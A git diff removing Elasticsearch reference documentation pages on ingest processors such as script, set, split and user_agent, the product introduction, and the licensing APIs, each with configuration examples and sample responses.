b/docs/reference/ingest/processors/rename.asciidoc deleted file mode 100644 index 538cfb048a8..00000000000 --- a/docs/reference/ingest/processors/rename.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[rename-processor]] -=== Rename processor -++++ -Rename -++++ - -Renames an existing field. 
If the field doesn't exist or the new name is already used, an exception will be thrown. - -[[rename-options]] -.Rename Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be renamed. Supports <>. -| `target_field` | yes | - | The new name of the field. Supports <>. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "rename": { - "field": "provider", - "target_field": "cloud.provider" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/script.asciidoc b/docs/reference/ingest/processors/script.asciidoc deleted file mode 100644 index 3453a966133..00000000000 --- a/docs/reference/ingest/processors/script.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[script-processor]] -=== Script processor -++++ -Script -++++ - -Allows inline and stored scripts to be executed within ingest pipelines. - -See <> to learn more about writing scripts. The Script Processor -leverages caching of compiled scripts for improved performance. Since the -script specified within the processor is potentially re-compiled per document, it is important -to understand how script caching works. To learn more about -caching see <>. - -[[script-options]] -.Script Options -[options="header"] -|====== -| Name | Required | Default | Description -| `lang` | no | "painless" | The scripting language -| `id` | no | - | The stored script id to refer to -| `source` | no | - | An inline script to be executed -| `params` | no | - | Script Parameters -include::common-options.asciidoc[] -|====== - -One of `id` or `source` options must be provided in order to properly reference a script to execute. - -You can access the current ingest document from within the script context by using the `ctx` variable. - -The following example sets a new field called `field_a_plus_b_times_c` to be the sum of two existing -numeric fields `field_a` and `field_b` multiplied by the parameter param_c: - -[source,js] --------------------------------------------------- -{ - "script": { - "lang": "painless", - "source": "ctx.field_a_plus_b_times_c = (ctx.field_a + ctx.field_b) * params.param_c", - "params": { - "param_c": 10 - } - } -} --------------------------------------------------- -// NOTCONSOLE - -It is possible to use the Script Processor to manipulate document metadata like `_index` and `_type` during -ingestion. Here is an example of an Ingest Pipeline that renames the index and type to `my-index` no matter what -was provided in the original index request: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/my-index -{ - "description": "use index:my-index", - "processors": [ - { - "script": { - "source": """ - ctx._index = 'my-index'; - ctx._type = '_doc'; - """ - } - } - ] -} --------------------------------------------------- - -Using the above pipeline, we can attempt to index a document into the `any-index` index. 
- -[source,console] --------------------------------------------------- -PUT any-index/_doc/1?pipeline=my-index -{ - "message": "text" -} --------------------------------------------------- -// TEST[continued] - -The response from the above index request: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index", - "_type": "_doc", - "_id": "1", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 89, - "_primary_term": 1, -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -In the above response, you can see that our document was actually indexed into `my-index` instead of -`any-index`. This type of manipulation is often convenient in pipelines that have various branches of transformation, -and depending on the progress made, indexed into different indices. diff --git a/docs/reference/ingest/processors/set-security-user.asciidoc b/docs/reference/ingest/processors/set-security-user.asciidoc deleted file mode 100644 index cd348e2d9bc..00000000000 --- a/docs/reference/ingest/processors/set-security-user.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ -[[ingest-node-set-security-user-processor]] -=== Set security user processor -++++ -Set security user -++++ - -Sets user-related details (such as `username`, `roles`, `email`, `full_name`, -`metadata`, `api_key`, `realm` and `authentication_type`) from the current -authenticated user to the current document by pre-processing the ingest. -The `api_key` property exists only if the user authenticates with an -API key. It is an object containing the `id` and `name` fields of the API key. -The `realm` property is also an object with two fields, `name` and `type`. -When using API key authentication, the `realm` property refers to the realm -from which the API key is created. -The `authentication_type` property is a string that can take value from -`REALM`, `API_KEY`, `TOKEN` and `ANONYMOUS`. - -IMPORTANT: Requires an authenticated user for the index request. - -[[set-security-user-options]] -.Set Security User Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to store the user information into. -| `properties` | no | [`username`, `roles`, `email`, `full_name`, `metadata`, `api_key`, `realm`, `authentication_type`] | Controls what user related properties are added to the `field`. -include::common-options.asciidoc[] -|====== - -The following example adds all user details for the current authenticated user -to the `user` field for all documents that are processed by this pipeline: - -[source,js] --------------------------------------------------- -{ - "processors" : [ - { - "set_security_user": { - "field": "user" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/set.asciidoc b/docs/reference/ingest/processors/set.asciidoc deleted file mode 100644 index e445bfaf229..00000000000 --- a/docs/reference/ingest/processors/set.asciidoc +++ /dev/null @@ -1,90 +0,0 @@ -[[set-processor]] -=== Set processor -++++ -Set -++++ - -Sets one field and associates it with the specified value. If the field already exists, -its value will be replaced with the provided one. 
-
-[[set-options]]
-.Set Options
-[options="header"]
-|======
-| Name                 | Required  | Default  | Description
-| `field`              | yes       | -        | The field to insert, upsert, or update. Supports <>.
-| `value`              | yes       | -        | The value to be set for the field. Supports <>.
-| `override`           | no        | true     | If `true`, the processor updates fields that already contain a non-null value. When set to `false`, such fields will not be touched.
-| `ignore_empty_value` | no        | `false`  | If `true` and `value` is a <> that evaluates to `null` or the empty string, the processor quietly exits without modifying the document
-include::common-options.asciidoc[]
-|======
-
-[source,js]
---------------------------------------------------
-{
-  "description" : "sets the value of count to 1",
-  "set": {
-    "field": "count",
-    "value": 1
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
-
-This processor can also be used to copy data from one field to another. For example:
-
-[source,console]
---------------------------------------------------
-PUT _ingest/pipeline/set_os
-{
-  "description": "sets the value of host.os.name from the field os",
-  "processors": [
-    {
-      "set": {
-        "field": "host.os.name",
-        "value": "{{os}}"
-      }
-    }
-  ]
-}
-
-POST _ingest/pipeline/set_os/_simulate
-{
-  "docs": [
-    {
-      "_source": {
-        "os": "Ubuntu"
-      }
-    }
-  ]
-}
---------------------------------------------------
-
-Result:
-
-[source,console-result]
---------------------------------------------------
-{
-  "docs" : [
-    {
-      "doc" : {
-        "_index" : "_index",
-        "_type" : "_doc",
-        "_id" : "_id",
-        "_source" : {
-          "host" : {
-            "os" : {
-              "name" : "Ubuntu"
-            }
-          },
-          "os" : "Ubuntu"
-        },
-        "_ingest" : {
-          "timestamp" : "2019-03-11T21:54:37.909224Z"
-        }
-      }
-    }
-  ]
-}
---------------------------------------------------
-// TESTRESPONSE[s/2019-03-11T21:54:37.909224Z/$body.docs.0.doc._ingest.timestamp/]
diff --git a/docs/reference/ingest/processors/sort.asciidoc b/docs/reference/ingest/processors/sort.asciidoc
deleted file mode 100644
index 81999d2d903..00000000000
--- a/docs/reference/ingest/processors/sort.asciidoc
+++ /dev/null
@@ -1,31 +0,0 @@
-[[sort-processor]]
-=== Sort processor
-++++
-Sort
-++++
-
-Sorts the elements of an array ascending or descending. Homogeneous arrays of numbers will be sorted
-numerically, while arrays of strings or heterogeneous arrays of strings + numbers will be sorted lexicographically.
-Throws an error when the field is not an array.
-
-[[sort-options]]
-.Sort Options
-[options="header"]
-|======
-| Name           | Required  | Default  | Description
-| `field`        | yes       | -        | The field to be sorted
-| `order`        | no        | `"asc"`  | The sort order to use. Accepts `"asc"` or `"desc"`.
-| `target_field` | no        | `field`  | The field to assign the sorted value to, by default `field` is updated in-place
-include::common-options.asciidoc[]
-|======
-
-[source,js]
---------------------------------------------------
-{
-  "sort": {
-    "field": "array_field_to_sort",
-    "order": "desc"
-  }
-}
---------------------------------------------------
-// NOTCONSOLE
diff --git a/docs/reference/ingest/processors/split.asciidoc b/docs/reference/ingest/processors/split.asciidoc
deleted file mode 100644
index 39e73b589f7..00000000000
--- a/docs/reference/ingest/processors/split.asciidoc
+++ /dev/null
@@ -1,49 +0,0 @@
-[[split-processor]]
-=== Split processor
-++++
-Split
-++++
-
-Splits a field into an array using a separator character. Only works on string fields.
- -[[split-options]] -.Split Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to split -| `separator` | yes | - | A regex which matches the separator, eg `,` or `\s+` -| `target_field` | no | `field` | The field to assign the split value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `preserve_trailing`| no | `false` | Preserves empty trailing fields, if any. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "split": { - "field": "my_field", - "separator": "\\s+" <1> - } -} --------------------------------------------------- -// NOTCONSOLE -<1> Treat all consecutive whitespace characters as a single separator - -If the `preserve_trailing` option is enabled, any trailing empty fields in the input will be preserved. For example, -in the configuration below, a value of `A,,B,,` in the `my_field` property will be split into an array of five elements -`["A", "", "B", "", ""]` with two empty trailing fields. If the `preserve_trailing` property were not enabled, the two -empty trailing fields would be discarded resulting in the three-element array `["A", "", "B"]`. - -[source,js] --------------------------------------------------- -{ - "split": { - "field": "my_field", - "separator": ",", - "preserve_trailing": true - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/trim.asciidoc b/docs/reference/ingest/processors/trim.asciidoc deleted file mode 100644 index 5b7c80ea803..00000000000 --- a/docs/reference/ingest/processors/trim.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[trim-processor]] -=== Trim processor -++++ -Trim -++++ - -Trims whitespace from field. If the field is an array of strings, all members of the array will be trimmed. - -NOTE: This only works on leading and trailing whitespace. - -[[trim-options]] -.Trim Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The string-valued field to trim whitespace from -| `target_field` | no | `field` | The field to assign the trimmed value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "trim": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/uppercase.asciidoc b/docs/reference/ingest/processors/uppercase.asciidoc deleted file mode 100644 index 6d334373d9c..00000000000 --- a/docs/reference/ingest/processors/uppercase.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[uppercase-processor]] -=== Uppercase processor -++++ -Uppercase -++++ - -Converts a string to its uppercase equivalent. If the field is an array of strings, all members of the array will be converted. 
- -[[uppercase-options]] -.Uppercase Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to make uppercase -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "uppercase": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/url-decode.asciidoc b/docs/reference/ingest/processors/url-decode.asciidoc deleted file mode 100644 index 5810fff90b0..00000000000 --- a/docs/reference/ingest/processors/url-decode.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[urldecode-processor]] -=== URL decode processor -++++ -URL decode -++++ - -URL-decodes a string. If the field is an array of strings, all members of the array will be decoded. - -[[urldecode-options]] -.URL Decode Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to decode -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "urldecode": { - "field": "my_url_to_decode" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/user-agent.asciidoc b/docs/reference/ingest/processors/user-agent.asciidoc deleted file mode 100644 index 073a02fef38..00000000000 --- a/docs/reference/ingest/processors/user-agent.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ -[[user-agent-processor]] -=== User agent processor -++++ -User agent -++++ - -The `user_agent` processor extracts details from the user agent string a browser sends with its web requests. -This processor adds this information by default under the `user_agent` field. - -The ingest-user-agent module ships by default with the regexes.yaml made available by uap-java with an Apache 2.0 license. For more details see https://github.com/ua-parser/uap-core. - -[[using-ingest-user-agent]] -==== Using the user_agent Processor in a Pipeline - -[[ingest-user-agent-options]] -.User-agent options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field containing the user agent string. -| `target_field` | no | user_agent | The field that will be filled with the user agent details. -| `regex_file` | no | - | The name of the file in the `config/ingest-user-agent` directory containing the regular expressions for parsing the user agent string. Both the directory and the file have to be created before starting Elasticsearch. If not specified, ingest-user-agent will use the regexes.yaml from uap-core it ships with (see below). -| `properties` | no | [`name`, `major`, `minor`, `patch`, `build`, `os`, `os_name`, `os_major`, `os_minor`, `device`] | Controls what properties are added to `target_field`. 
-| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `ecs` | no | `true` | Whether to return the output in Elastic Common Schema format. NOTE: This setting is deprecated and will be removed in a future version. -|====== - -Here is an example that adds the user agent details to the `user_agent` field based on the `agent` field: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/user_agent -{ - "description" : "Add user agent information", - "processors" : [ - { - "user_agent" : { - "field" : "agent" - } - } - ] -} -PUT my-index-000001/_doc/my_id?pipeline=user_agent -{ - "agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" -} -GET my-index-000001/_doc/my_id --------------------------------------------------- - -Which returns - -[source,console-result] --------------------------------------------------- -{ - "found": true, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "my_id", - "_version": 1, - "_seq_no": 22, - "_primary_term": 1, - "_source": { - "agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", - "user_agent": { - "name": "Chrome", - "original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36", - "version": "51.0.2704.103", - "os": { - "name": "Mac OS X", - "version": "10.10.5", - "full": "Mac OS X 10.10.5" - }, - "device" : { - "name" : "Mac" - }, - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term": 1/"_primary_term" : $body._primary_term/] - -===== Using a custom regex file -To use a custom regex file for parsing the user agents, that file has to be put into the `config/ingest-user-agent` directory and -has to have a `.yml` filename extension. The file has to be present at node startup, any changes to it or any new files added -while the node is running will not have any effect. - -In practice, it will make most sense for any custom regex file to be a variant of the default file, either a more recent version -or a customised version. - -The default file included in `ingest-user-agent` is the `regexes.yaml` from uap-core: https://github.com/ua-parser/uap-core/blob/master/regexes.yaml - -[[ingest-user-agent-settings]] -===== Node Settings - -The `user_agent` processor supports the following setting: - -`ingest.user_agent.cache_size`:: - - The maximum number of results that should be cached. Defaults to `1000`. - -Note that these settings are node settings and apply to all `user_agent` processors, i.e. there is one cache for all defined `user_agent` processors. diff --git a/docs/reference/intro.asciidoc b/docs/reference/intro.asciidoc deleted file mode 100644 index 00f3cb9c695..00000000000 --- a/docs/reference/intro.asciidoc +++ /dev/null @@ -1,266 +0,0 @@ -[[elasticsearch-intro]] -== What is {es}? -_**You know, for search (and analysis)**_ - -{es} is the distributed search and analytics engine at the heart of -the {stack}. {ls} and {beats} facilitate collecting, aggregating, and -enriching your data and storing it in {es}. {kib} enables you to -interactively explore, visualize, and share insights into your data and manage -and monitor the stack. {es} is where the indexing, search, and analysis -magic happens. 
- -{es} provides near real-time search and analytics for all types of data. Whether you -have structured or unstructured text, numerical data, or geospatial data, -{es} can efficiently store and index it in a way that supports fast searches. -You can go far beyond simple data retrieval and aggregate information to discover -trends and patterns in your data. And as your data and query volume grows, the -distributed nature of {es} enables your deployment to grow seamlessly right -along with it. - -While not _every_ problem is a search problem, {es} offers speed and flexibility -to handle data in a wide variety of use cases: - -* Add a search box to an app or website -* Store and analyze logs, metrics, and security event data -* Use machine learning to automatically model the behavior of your data in real - time -* Automate business workflows using {es} as a storage engine -* Manage, integrate, and analyze spatial information using {es} as a geographic - information system (GIS) -* Store and process genetic data using {es} as a bioinformatics research tool - -We’re continually amazed by the novel ways people use search. But whether -your use case is similar to one of these, or you're using {es} to tackle a new -problem, the way you work with your data, documents, and indices in {es} is -the same. - -[[documents-indices]] -=== Data in: documents and indices - -{es} is a distributed document store. Instead of storing information as rows of -columnar data, {es} stores complex data structures that have been serialized -as JSON documents. When you have multiple {es} nodes in a cluster, stored -documents are distributed across the cluster and can be accessed immediately -from any node. - -When a document is stored, it is indexed and fully searchable in <>--within 1 second. {es} uses a data structure called an -inverted index that supports very fast full-text searches. An inverted index -lists every unique word that appears in any document and identifies all of the -documents each word occurs in. - -An index can be thought of as an optimized collection of documents and each -document is a collection of fields, which are the key-value pairs that contain -your data. By default, {es} indexes all data in every field and each indexed -field has a dedicated, optimized data structure. For example, text fields are -stored in inverted indices, and numeric and geo fields are stored in BKD trees. -The ability to use the per-field data structures to assemble and return search -results is what makes {es} so fast. - -{es} also has the ability to be schema-less, which means that documents can be -indexed without explicitly specifying how to handle each of the different fields -that might occur in a document. When dynamic mapping is enabled, {es} -automatically detects and adds new fields to the index. This default -behavior makes it easy to index and explore your data--just start -indexing documents and {es} will detect and map booleans, floating point and -integer values, dates, and strings to the appropriate {es} data types. - -Ultimately, however, you know more about your data and how you want to use it -than {es} can. You can define rules to control dynamic mapping and explicitly -define mappings to take full control of how fields are stored and indexed. 
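-
-For instance, an explicit mapping for a handful of fields might look like the sketch below (the
-index name and field names here are illustrative only, not part of any particular dataset):
-
-[source,console]
---------------------------------------------------
-PUT /my-explicit-index
-{
-  "mappings": {
-    "properties": {
-      "title":      { "type": "text" },
-      "status":     { "type": "keyword" },
-      "created_at": { "type": "date" },
-      "location":   { "type": "geo_point" }
-    }
-  }
-}
---------------------------------------------------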
- -Defining your own mappings enables you to: - -* Distinguish between full-text string fields and exact value string fields -* Perform language-specific text analysis -* Optimize fields for partial matching -* Use custom date formats -* Use data types such as `geo_point` and `geo_shape` that cannot be automatically -detected - -It’s often useful to index the same field in different ways for different -purposes. For example, you might want to index a string field as both a text -field for full-text search and as a keyword field for sorting or aggregating -your data. Or, you might choose to use more than one language analyzer to -process the contents of a string field that contains user input. - -The analysis chain that is applied to a full-text field during indexing is also -used at search time. When you query a full-text field, the query text undergoes -the same analysis before the terms are looked up in the index. - -[[search-analyze]] -=== Information out: search and analyze - -While you can use {es} as a document store and retrieve documents and their -metadata, the real power comes from being able to easily access the full suite -of search capabilities built on the Apache Lucene search engine library. - -{es} provides a simple, coherent REST API for managing your cluster and indexing -and searching your data. For testing purposes, you can easily submit requests -directly from the command line or through the Developer Console in {kib}. From -your applications, you can use the -https://www.elastic.co/guide/en/elasticsearch/client/index.html[{es} client] -for your language of choice: Java, JavaScript, Go, .NET, PHP, Perl, Python -or Ruby. - -[discrete] -[[search-data]] -==== Searching your data - -The {es} REST APIs support structured queries, full text queries, and complex -queries that combine the two. Structured queries are -similar to the types of queries you can construct in SQL. For example, you -could search the `gender` and `age` fields in your `employee` index and sort the -matches by the `hire_date` field. Full-text queries find all documents that -match the query string and return them sorted by _relevance_—how good a -match they are for your search terms. - -In addition to searching for individual terms, you can perform phrase searches, -similarity searches, and prefix searches, and get autocomplete suggestions. - -Have geospatial or other numerical data that you want to search? {es} indexes -non-textual data in optimized data structures that support -high-performance geo and numerical queries. - -You can access all of these search capabilities using {es}'s -comprehensive JSON-style query language (<>). You can also -construct <> to search and aggregate data -natively inside {es}, and JDBC and ODBC drivers enable a broad range of -third-party applications to interact with {es} via SQL. - -[discrete] -[[analyze-data]] -==== Analyzing your data - -{es} aggregations enable you to build complex summaries of your data and gain -insight into key metrics, patterns, and trends. Instead of just finding the -proverbial “needle in a haystack”, aggregations enable you to answer questions -like: - -* How many needles are in the haystack? -* What is the average length of the needles? -* What is the median length of the needles, broken down by manufacturer? -* How many needles were added to the haystack in each of the last six months? - -You can also use aggregations to answer more subtle questions, such as: - -* What are your most popular needle manufacturers? 
-* Are there any unusual or anomalous clumps of needles? - -Because aggregations leverage the same data-structures used for search, they are -also very fast. This enables you to analyze and visualize your data in real time. -Your reports and dashboards update as your data changes so you can take action -based on the latest information. - -What’s more, aggregations operate alongside search requests. You can search -documents, filter results, and perform analytics at the same time, on the same -data, in a single request. And because aggregations are calculated in the -context of a particular search, you’re not just displaying a count of all -size 70 needles, you’re displaying a count of the size 70 needles -that match your users' search criteria--for example, all size 70 _non-stick -embroidery_ needles. - -[discrete] -[[more-features]] -===== But wait, there’s more - -Want to automate the analysis of your time series data? You can use -{ml-docs}/ml-overview.html[machine learning] features to create accurate -baselines of normal behavior in your data and identify anomalous patterns. With -machine learning, you can detect: - -* Anomalies related to temporal deviations in values, counts, or frequencies -* Statistical rarity -* Unusual behaviors for a member of a population - -And the best part? You can do this without having to specify algorithms, models, -or other data science-related configurations. - -[[scalability]] -=== Scalability and resilience: clusters, nodes, and shards -++++ -Scalability and resilience -++++ - -{es} is built to be always available and to scale with your needs. It does this -by being distributed by nature. You can add servers (nodes) to a cluster to -increase capacity and {es} automatically distributes your data and query load -across all of the available nodes. No need to overhaul your application, {es} -knows how to balance multi-node clusters to provide scale and high availability. -The more nodes, the merrier. - -How does this work? Under the covers, an {es} index is really just a logical -grouping of one or more physical shards, where each shard is actually a -self-contained index. By distributing the documents in an index across multiple -shards, and distributing those shards across multiple nodes, {es} can ensure -redundancy, which both protects against hardware failures and increases -query capacity as nodes are added to a cluster. As the cluster grows (or shrinks), -{es} automatically migrates shards to rebalance the cluster. - -There are two types of shards: primaries and replicas. Each document in an index -belongs to one primary shard. A replica shard is a copy of a primary shard. -Replicas provide redundant copies of your data to protect against hardware -failure and increase capacity to serve read requests -like searching or retrieving a document. - -The number of primary shards in an index is fixed at the time that an index is -created, but the number of replica shards can be changed at any time, without -interrupting indexing or query operations. - -[discrete] -[[it-depends]] -==== It depends... - -There are a number of performance considerations and trade offs with respect -to shard size and the number of primary shards configured for an index. The more -shards, the more overhead there is simply in maintaining those indices. The -larger the shard size, the longer it takes to move shards around when {es} -needs to rebalance a cluster. 
- -Querying lots of small shards makes the processing per shard faster, but more -queries means more overhead, so querying a smaller -number of larger shards might be faster. In short...it depends. - -As a starting point: - -* Aim to keep the average shard size between a few GB and a few tens of GB. For - use cases with time-based data, it is common to see shards in the 20GB to 40GB - range. - -* Avoid the gazillion shards problem. The number of shards a node can hold is - proportional to the available heap space. As a general rule, the number of - shards per GB of heap space should be less than 20. - -The best way to determine the optimal configuration for your use case is -through https://www.elastic.co/elasticon/conf/2016/sf/quantitative-cluster-sizing[ -testing with your own data and queries]. - -[discrete] -[[disaster-ccr]] -==== In case of disaster - -For performance reasons, the nodes within a cluster need to be on the same -network. Balancing shards in a cluster across nodes in different data centers -simply takes too long. But high-availability architectures demand that you avoid -putting all of your eggs in one basket. In the event of a major outage in one -location, servers in another location need to be able to take over. Seamlessly. -The answer? {ccr-cap} (CCR). - -CCR provides a way to automatically synchronize indices from your primary cluster -to a secondary remote cluster that can serve as a hot backup. If the primary -cluster fails, the secondary cluster can take over. You can also use CCR to -create secondary clusters to serve read requests in geo-proximity to your users. - -{ccr-cap} is active-passive. The index on the primary cluster is -the active leader index and handles all write requests. Indices replicated to -secondary clusters are read-only followers. - -[discrete] -[[admin]] -==== Care and feeding - -As with any enterprise system, you need tools to secure, manage, and -monitor your {es} clusters. Security, monitoring, and administrative features -that are integrated into {es} enable you to use {kibana-ref}/introduction.html[{kib}] -as a control center for managing a cluster. Features like <> and <> -help you intelligently manage your data over time. diff --git a/docs/reference/licensing/delete-license.asciidoc b/docs/reference/licensing/delete-license.asciidoc deleted file mode 100644 index 04c095110cc..00000000000 --- a/docs/reference/licensing/delete-license.asciidoc +++ /dev/null @@ -1,48 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[delete-license]] -=== Delete license API -++++ -Delete license -++++ - -This API enables you to delete licensing information. - -[discrete] -==== Request - -`DELETE /_license` - -[discrete] -==== Description - -When your license expires, {xpack} operates in a degraded mode. For more -information, see -{kibana-ref}/managing-licenses.html#license-expiration[License expiration]. - -[discrete] -==== Authorization - -You must have `manage` cluster privileges to use this API. -For more information, see -<>. 
-
-[discrete]
-==== Examples
-
-The following example deletes the current license:
-
-[source,console]
-------------------------------------------------------------
-DELETE /_license
-------------------------------------------------------------
-// TEST[skip:license testing issues]
-
-When the license is successfully deleted, the API returns the following response:
-[source,js]
-------------------------------------------------------------
-{
-  "acknowledged": true
-}
-------------------------------------------------------------
-// NOTCONSOLE
\ No newline at end of file
diff --git a/docs/reference/licensing/get-basic-status.asciidoc b/docs/reference/licensing/get-basic-status.asciidoc
deleted file mode 100644
index ea5e3466845..00000000000
--- a/docs/reference/licensing/get-basic-status.asciidoc
+++ /dev/null
@@ -1,48 +0,0 @@
-[role="xpack"]
-[testenv="basic"]
-[[get-basic-status]]
-=== Get basic status API
-++++
-Get basic status
-++++
-
-This API enables you to check the status of your basic license.
-
-[discrete]
-==== Request
-
-`GET /_license/basic_status`
-
-[discrete]
-==== Description
-
-In order to initiate a basic license, you must not currently have a basic
-license.
-
-For more information about the different types of licenses, see
-https://www.elastic.co/subscriptions.
-
-==== Authorization
-
-You must have `monitor` cluster privileges to use this API.
-For more information, see <>.
-
-[discrete]
-==== Examples
-
-The following example checks whether you are eligible to start a basic license:
-
-[source,console]
-------------------------------------------------------------
-GET /_license/basic_status
-------------------------------------------------------------
-
-Example response:
-
-[source,console-result]
-------------------------------------------------------------
-{
-  "eligible_to_start_basic": true
-}
-------------------------------------------------------------
-// TESTRESPONSE[s/"eligible_to_start_basic": true/"eligible_to_start_basic": $body.eligible_to_start_basic/]
diff --git a/docs/reference/licensing/get-license.asciidoc b/docs/reference/licensing/get-license.asciidoc
deleted file mode 100644
index 527d6ef54ca..00000000000
--- a/docs/reference/licensing/get-license.asciidoc
+++ /dev/null
@@ -1,77 +0,0 @@
-[role="xpack"]
-[testenv="basic"]
-[[get-license]]
-=== Get license API
-++++
-Get license
-++++
-
-This API enables you to retrieve licensing information.
-
-[discrete]
-==== Request
-
-`GET /_license`
-
-[discrete]
-==== Description
-
-This API returns information about the type of license, when it was issued, and
-when it expires, for example.
-
-For more information about the different types of licenses, see
-https://www.elastic.co/subscriptions.
-
-
-[discrete]
-==== Query Parameters
-
-`local`::
-  (Boolean) Specifies whether to retrieve local information. The default value
-  is `false`, which means the information is retrieved from the master node.
-
-
-[discrete]
-==== Authorization
-
-You must have `monitor` cluster privileges to use this API.
-For more information, see <>.
- - -[discrete] -==== Examples - -The following example provides information about a trial license: - -[source,console] --------------------------------------------------- -GET /_license --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "license" : { - "status" : "active", - "uid" : "cbff45e7-c553-41f7-ae4f-9205eabd80xx", - "type" : "trial", - "issue_date" : "2018-10-20T22:05:12.332Z", - "issue_date_in_millis" : 1540073112332, - "expiry_date" : "2018-11-19T22:05:12.332Z", - "expiry_date_in_millis" : 1542665112332, - "max_nodes" : 1000, - "issued_to" : "test", - "issuer" : "elasticsearch", - "start_date_in_millis" : -1 - } -} --------------------------------------------------- -// TESTRESPONSE[s/"cbff45e7-c553-41f7-ae4f-9205eabd80xx"/$body.license.uid/] -// TESTRESPONSE[s/"basic"/$body.license.type/] -// TESTRESPONSE[s/"2018-10-20T22:05:12.332Z"/$body.license.issue_date/] -// TESTRESPONSE[s/1540073112332/$body.license.issue_date_in_millis/] -// TESTRESPONSE[s/"2018-11-19T22:05:12.332Z"/$body.license.expiry_date/] -// TESTRESPONSE[s/1542665112332/$body.license.expiry_date_in_millis/] -// TESTRESPONSE[s/1000/$body.license.max_nodes/] -// TESTRESPONSE[s/"test"/$body.license.issued_to/] -// TESTRESPONSE[s/"elasticsearch"/$body.license.issuer/] diff --git a/docs/reference/licensing/get-trial-status.asciidoc b/docs/reference/licensing/get-trial-status.asciidoc deleted file mode 100644 index d68365762bb..00000000000 --- a/docs/reference/licensing/get-trial-status.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[get-trial-status]] -=== Get trial status API -++++ -Get trial status -++++ - -Enables you to check the status of your trial. - -[discrete] -==== Request - -`GET /_license/trial_status` - -[discrete] -==== Description - -If you want to try all the subscription features, you can start a 30-day trial. - -NOTE: You are allowed to initiate a trial only if your cluster has not -already activated a trial for the current major product version. For example, if -you have already activated a trial for v6.0, you cannot start a new trial until -v7.0. You can, however, request an extended trial at {extendtrial}. - -For more information about features and subscriptions, see -https://www.elastic.co/subscriptions. - -==== Authorization - -You must have `monitor` cluster privileges to use this API. -For more information, see -<>. 
